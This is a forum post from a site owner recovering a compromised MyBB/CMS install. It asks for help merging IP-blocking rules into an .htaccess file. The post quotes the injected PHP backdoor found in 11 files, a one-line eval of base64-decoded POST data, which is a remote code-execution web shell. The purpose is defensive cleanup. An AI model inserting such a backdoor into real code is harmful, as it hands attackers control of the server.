OK, but please why does DiffMerge come up with some hundred different files? I did not change them until now, because I don't now, how to do that.
I was scanning our CMS now, there are only 11 different files and the only difference on these files is this line on the end of the file replacing the php end code:
if (isset($_POST['update'])) {eval(base64_decode($_POST['update'])); exit;}
There is no
?>
Looking for the Code, I posted here, on Google, I found this website with a lot of interesting tips:
Versatile .CC Attacks | Unmask Parasites. Blog
I manually edited this very malicious code off-line, to prevent from further disturbances
I got the upload of the cleaned up files.
But now I need to know something from you, I want to change my .htaccess file
By the moment I have this code inside:
# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
I want to add these lines
# Begin IP blocking #
Order Allow,Deny
Deny from 74.220.219.113
Deny from 98.130.0.160
Allow from all
# End IP blocking #
Could you please give me the good whole code for the new .htaccess file
... and then I am going on to clean up our server...
Perhaps I ought to mention, that I made a backup of all files and folders of our server, the day before I ran the upgrade of MyBB .. these files do not show up any differences. Differences came later in October 2011.